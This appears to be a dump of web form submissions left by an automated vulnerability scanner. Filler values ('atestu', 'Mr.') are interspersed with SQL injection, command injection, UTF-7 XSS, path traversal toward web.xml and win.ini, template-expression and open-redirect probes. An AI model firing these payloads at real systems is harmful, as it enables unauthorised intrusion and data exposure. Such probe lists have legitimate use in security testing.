atestu LIMIT 0,1 UNION ALL SELECT CONCAT(0x6c7a4b734d444c46,(SELECT (CASE WHEN (5595=5595) THEN 1 ELSE 0 END)),0x6c7a4b734d444c46)-- end
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu LIMIT 0,1 UNION ALL SELECT CONCAT(0x4a6d734f37646b70,(SELECT (CASE WHEN (5492=5492) THEN 1 ELSE 0 END)),0x4a6d734f37646b70),NULL-- end
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
http://106.187.100.180/f2ad59a56eeb6bbe5e51082aa56434c5.jpg
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
data:;base64,PD9waHAgZWNobyAnaXhocWJyem9va3NtanBqdmRwZnEnLidpaHFlbWRmdG9mc2V5Ynhoem5ncic7Pz4=
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu&ping -n 21 127.0.0.1&
-
atestu
-
atestu
-
atestu
-
atestu;ping -c 21 127.0.0.1;
-
atestu
-
atestu
-
atestu
-
atestu;ping -c 11 127.0.0.1;
-
atestucmeyzh#*/-->'");>128http://=https://129 130 cmeyzh
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestuecho bmdljebzqgftrsuwohvd$(echo frbocshmkvoxapuegudq)qqrzfvnjfttlinmzpaxb;
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu&ping -n 21 127.0.0.1&
-
atestu
-
http://www.justfortest.com
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu& set var=ihgjuyzdqwowynxklqheeusnhdfyrmancqvfqdmppjpuvhtntqfjwynrgmkz & call echo ^%var^% &
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu;echo bmdljebzqgftrsuwohvd$(echo frbocshmkvoxapuegudq)qqrzfvnjfttlinmzpaxb;
-
atestu
-
atestu
-
atestu
-
atestu& set var=bmdljebzqgftrsuwohvdfrbocshmkvoxapuegudqqqrzfvnjfttlinmzpaxb & call echo ^%var^% &
-
atestu
-
atestu
-
atestu
-
atestu
gelukh: gelukh.htm
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestufzuxdr#*/-->'");>160http://=https://161 162 fzuxdr
-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
jkudwynqmx
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
+/v8APA-script+AD4-alert(/xss/)+ADw-/script+AD4-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
-
atestu
-
atestu
-
'
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
"())[]]{}}'/@^*$;#,
-
atestu
-
*/*'%00
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
4294967297
-
-99999999
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu&ping -n 21 127.0.0.1&
-
atestu
-
atestu
-
atestu
-
atestu& set var=bipzaqvxlwezdkjbdkilzzfqadkowvnrmyutjpiqeidvrlacukwepoyxzcjh & call echo ^%var^% &
-
atestu
-
atestu
-
http://www.gzaudio.net@www.justfortest.com
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
//www.justfortest.com
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu&ping -n 21 127.0.0.1&
-
atestu
-
atestu
-
atestu
-
atestu&ping -n 11 127.0.0.1&
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu& set var=zlymejstlvfmtbhukncaphacnhxffystpwbkatuszdugvdieaiglqzlphwoj & call echo ^%var^% &
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestuecho zlymejstlvfmtbhuknca$(echo phacnhxffystpwbkatus)zdugvdieaiglqzlphwoj;
-
atestu
-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
-
-
-
-99999999
-
*/*'%00
-
"())[]]{}}'/@^*$;#,
-
'
-
atestu
-
4294967297
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
data:;base64,PD9waHAgZWNobyAnYXZzZmVjb21ndWFneXlrZGt4d20nLidkdmR5bWlmeGNhc2VocnBsbWp5eCc7Pz4=
-
http://106.187.100.180/f2ad59a56eeb6bbe5e51082aa56434c5.jpg
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
/..\..\WEB-INF\web.xml?
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
//../....//....//WEB-INF/web.xml?
-
atestu
-
../../../../WEB-INF/web.xml?
-
atestu
-
../../../WEB-INF/web.xml?
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
//../....//....//WEB-INF/web.xml?
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
../../../../../../../../../../boot.ini
-
atestu
-
../../../../../../../../../../windows/win.ini
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
..\..\..\..\..\..\..\..\windows\win.ini
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
./WEB-INF/web.xml?
-
../../WEB-INF/web.xml?
-
../../../../WEB-INF/web.xml?
-
../WEB-INF/web.xml?
-
../../../WEB-INF/web.xml?
-
./WEB-INF/web.xml?
-
/..\..\WEB-INF\web.xml?
-
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
-
../../WEB-INF/web.xml?
-
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
-
../../../../../../../../../../windows/win.ini
-
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
-
atestu
-
..\..\..\..\..\..\..\..\windows\win.ini
-
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
-
..\..\..\..\..\..\..\..\windows\win.ini
-
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
-
../../../../../../../../../../windows/win.ini
-
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
-
../../../../../../../../../../boot.ini
-
..\..\..\..\..\..\..\..\windows\win.ini
-
../../../../../../../../../../windows/win.ini
-
../WEB-INF/web.xml?
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1702
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1634 AnD 1634=1634 AnD 1634=1635 --
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1702' AnD 1702=1702 AnD '1702'='1703' --
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1702
-
atestu
-
1702' AnD 1702=1702 AnD '1702'='1702' --
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1634 AnD 1634=1634 AnD 1634=1634 --
-
atestu
-
atestu
-
atestu
-
1921") AnD 1921=1921 AnD ("1921"="1922
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1921
-
atestu
-
atestu
-
atestu
-
1921") AnD 1921=1921 AnD ("1921"="1921
-
atestu
-
1855
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1634
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1634
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1310
-
./WEB-INF/web.xml?
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1384" AnD 1384=1384 AnD "1384"="1384" --
-
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
-
atestu
-
atestu
-
1384" AnD 1384=1384 AnD "1384"="1385" --
-
atestu
-
atestu
-
atestu
-
/..\..\WEB-INF\web.xml?
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1310') AnD 1310=1310 AnD ('1310'='1310') --
-
atestu
-
../../WEB-INF/web.xml?
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1310
-
../WEB-INF/web.xml?
-
atestu
-
atestu
-
atestu
-
atestu
-
../../../../../../../../../../boot.ini
-
atestu
-
atestu
-
atestu
-
../../../../../../../../../../windows/win.ini
-
1855) AnD 1855=1855 AnD (1855=1855) --
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1855
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
../../../../../../../../../../windows/win.ini
-
atestu
-
atestu
-
1384
-
atestu
-
atestu
-
1384
-
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
..\..\..\..\..\..\..\..\windows\win.ini
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
..\..\..\..\..\..\..\..\windows\win.ini
-
1855) AnD 1855=1855 AnD (1855=1856) --
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1765
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1765
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1522
-
atestu
-
atestu
-
1765' AnD 1765=1765 AnD '1765'='1765
-
atestu
-
atestu
-
atestu
-
atestu
-
1765' AnD 1765=1765 AnD '1765'='1766
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1814
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
\x00title' RLIKE IF(1839=1840,0x1839,0x28) AND '1841'='1841\x00
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
\x00title' RLIKE IF(1839=1839,0x1839,0x28) AND '1841'='1841\x00
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1814 AnD 1814=1814 AnD 1814=1815
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1814
-
atestu
-
atestu
-
atestu
-
1814 AnD 1814=1814 AnD 1814=1814
-
1933
-
atestu
-
atestu
-
atestu
-
1933
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1708) AnD 1708=1708 AnD (1708=1709
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1921
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1933') AnD 1933=1933 AnD ('1933'='1934
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1933') AnD 1933=1933 AnD ('1933'='1933
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1522" AnD 1522=1522 AnD "1522"="1523
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1522" AnD 1522=1522 AnD "1522"="1522
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1708) AnD 1708=1708 AnD (1708=1708
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1522
-
1708
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1708
-
atestu
-
atestu
-
atestu"+response.write(2921189*3400990)+"
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu^(#$!@#$)(()))******
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu"NotExist
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
+/v8APA-script+AD4-alert(/xss/)+ADw-/script+AD4-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1310') AnD 1310=1310 AnD ('1310'='1311') --
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
4294967297
-
Mr.
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
-
-
-
-
-99999999
-
*/*'%00
-
"())[]]{}}'/@^*$;#,
-
'
-
atestu
-
atestu
-
${95958707+60324071}
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1261 AnD 1261=1261 Or 1261=1261
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1261 AnD 1261=1261 Or 1261=1262
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1354
-
atestu
-
atestu
-
atestu
-
1354' AnD 1354=1354 Or '1354'='1355
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1354
-
atestu
-
atestu
-
atestu
-
1261
-
//../....//....//WEB-INF/web.xml?
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1561
-
atestu
-
1561") AnD 1561=1561 AnD ("1561"="1561") --
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1561
-
atestu
-
../../../WEB-INF/web.xml?
-
atestu
-
atestu
-
atestu
-
../../../../WEB-INF/web.xml?
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1261
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1561") AnD 1561=1561 AnD ("1561"="1562") --
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1856) AnD 1856=1856 Or (1856=1857
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1856
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1856) AnD 1856=1856 Or (1856=1856
-
atestu
-
atestu
-
atestu
-
atestuivvugk#*/-->'");>161http://=https://162 163 ivvugk
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1851
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1851
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1354' AnD 1354=1354 Or '1354'='1354
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1856
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
atestu
-
1851" AnD 1851=1851 Or "1851"="1852
-
atestu
-
atestu
-
atestu
-
1851" AnD 1851=1851 Or "1851"="1851
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.&n935109=v909523
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
${10000083+9999948}
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
XVWTMPeC
-
Mr.
-
Mr.
-
Mr.
-
${9999592+9999892}
-
Mr.
-
Mr.
-
gIZO5wZ0
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
370'
-
1bBtYBJu'));select pg_sleep(27.891000000000002); --
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
pcFKk3G2')); waitfor delay '0:0:18.594' --
-
Mr.
-
Mr.
-
nXvbBEUZ');select pg_sleep(18.594); --
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
-1 OR 2+523-523-1=0+0+0+1
-
Mr.
-
-1' OR 2+53-53-1=0+0+0+1 --
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
Mr.
-
246'
-
Mr.
-
IA3rYl5X'); waitfor delay '0:0:9.297' --
-
muknA4CF'; waitfor delay '0:0:9.297' --
-
1 waitfor delay '0:0:9.297' --
-
-1" OR 2+445-445-1=0+0+0+1 --
-
-1' OR 2+803-803-1=0+0+0+1 or 'dwvVJIp1'='
-
-1' OR 2+741-741-1=0+0+0+1 --
-
-1 OR 2+197-197-1=0+0+0+1
-
-1 OR 2+681-681-1=0+0+0+1 --
-
-1 OR 2+78-78-1=0+0+0+1 --
-
Mr.
-
vdLgRrTX';select pg_sleep(18.594); --
-
1VlhehH9'));select pg_sleep(21.891); --
-
rD34Xk4J');select pg_sleep(21.891); --
-
yNrJiQ50';select pg_sleep(21.891); --
-
7BjYAJ30')); waitfor delay '0:0:14.594' --
-
GcEj7Dm8'); waitfor delay '0:0:14.594' --
-
j2Wrhv6T'; waitfor delay '0:0:14.594' --
-
1 waitfor delay '0:0:14.594' --
-
-1" OR 2+729-729-1=0+0+0+1 --
-
-1' OR 2+558-558-1=0+0+0+1 or '8ySWIOms'='
-
Mr.
-
Mr.
-
Mr.
-
